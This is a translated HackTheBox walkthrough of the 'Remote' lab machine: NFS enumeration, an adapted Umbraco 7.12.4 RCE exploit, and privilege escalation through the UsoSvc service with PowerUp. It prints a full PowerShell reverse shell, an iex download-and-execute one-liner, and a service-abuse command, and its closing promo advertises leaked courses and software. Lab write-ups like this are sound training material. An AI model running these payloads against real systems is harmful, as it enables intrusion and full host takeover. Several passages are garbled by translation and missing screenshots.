HackTheBox. Passage of Remote. NFS, RCE in CMS Umbraco and LPE via UsoSvc



I continue to publish solutions sent to the finalization of machines from the HackTheBox site .



In this article, we dig into the NFS resource, deal with the RCE exploit for the CMS Umbraco and find the LPE vector via UsoSvc using PowerUp.



The connection to the laboratory is via VPN. It is recommended not to connect from a work computer or from a host where there is important data for you, as you find yourself in a private network with people who know something about information security.



Organizational information
, , Telegram . , , .



. , - , .



Recon



This machine has an IP address of 10.10.10.180, which I add to / etc / hosts.



10.10.10.180 	remote.htb


The first step is to scan open ports. Since it takes a long time to scan all ports with nmap, I will first do it using masscan. We scan all TCP and UDP ports from the tun0 interface at 500 packets per second.



masscan -e tun0 -p1-65535,U:1-65535 10.10.10.180 --rate=500






Many ports are open on the host. Now let's scan them with nmap to filter and select the ones we need.

nmap remote.htb -p49680,49667,49666,49665,80,139,49678,5985,135,49679,111,445,47001,2049,49664,21






Now, to get more detailed information about the services that run on the ports, run a scan with the -A option.



nmap -A remote.htb -p49680,49667,49666,49665,80,139,49678,5985,135,49679,111,445,47001,2049,49664,21






Port 111 is responsible for NFS (allows you to mount remote file systems over the network). Let's see the list of resources.







We have available resources, let's mount this resource.







And in this directory we find Web.config and the Umbraco folder. Umbraco is an open source content management system platform.







Thus, we need to see all the configs, as well as find out the version of Umbraco. This is what can be noted in the Web.Config.











Find the credentials for smtp and the Umbraco version: 7.12.4. Koraya is vulnerable if credentials are present.



Entry Point







Next, I listed all the files and directories that are on the remote server in order to select and view the files that are of interest.

ls -lR ./


















After the range of files is limited, you should look at them (you can superficially use grep to select such lines as: user, login, pass, vers, etc.). This is how we find information about the existence of two users:











After that, we grep again looking for the lines admin and ssmith. And we find hashes for user data.











And successfully hack the administrator password.







If you look at the exploit-db base, then there is a ready-made exploit, but it needs to be slightly changed.







USER



First: we will specify the credentials and host.







Secondly, we will change the load by specifying the executable file and parameters to it. In this case, we use ping for the test.







As soon as the program runs, we will see ICMP packets in tcpdump.











Let's load the following reverse shell:

$client = New-Object System.Net.Sockets.TCPClient('10.10.15.60',4321)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$sendback = (iex $data 2>&1 | Out-String )
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()




Let's save it in shell.ps1, start the http server on the local machine.

sudo python3 -m http.server


Let's change the load.







And after executing, we get a backconnect.







There are no user directories on the server, so we find the flag in the Public.







ROOT



Having looked at the information about the user, we notice an interesting privilege.







But since this is Windows Server 2019, impersonating the token for LPE will not work.







Let's use PowerUp to find the LPE vector. Let's download it from localhost and do a full check.

iex (New-Object Net.WebClient).DownloadString('http://10.10.15.60/tools/PowerUp.ps1');Invoke-AllChecks






And we have permissions to Update Orchestrator Service. Update Orchestrator is a service that organizes Windows updates for you. This service is responsible for downloading, installing and checking for updates for the computer.



Let's create a second shell (change the port in the first) and load it onto the machine.

wget http://10.10.15.60/shell2.ps1 -O C:\Windows\Temp\shell2.ps1


And now let's run it with UsoSvc.

Invoke-ServiceAbuse -Name UsoSvc -Command "cmd.exe /c powershell C:\Windows\Temp\shell2.ps1"






And we get a backconnect.







You can join us on Telegram . There you can find interesting materials, leaked courses, and software. Let's gather a community, in which there will be people who are versed in many areas of IT, then we can always help each other on any IT and information security issues.



All Articles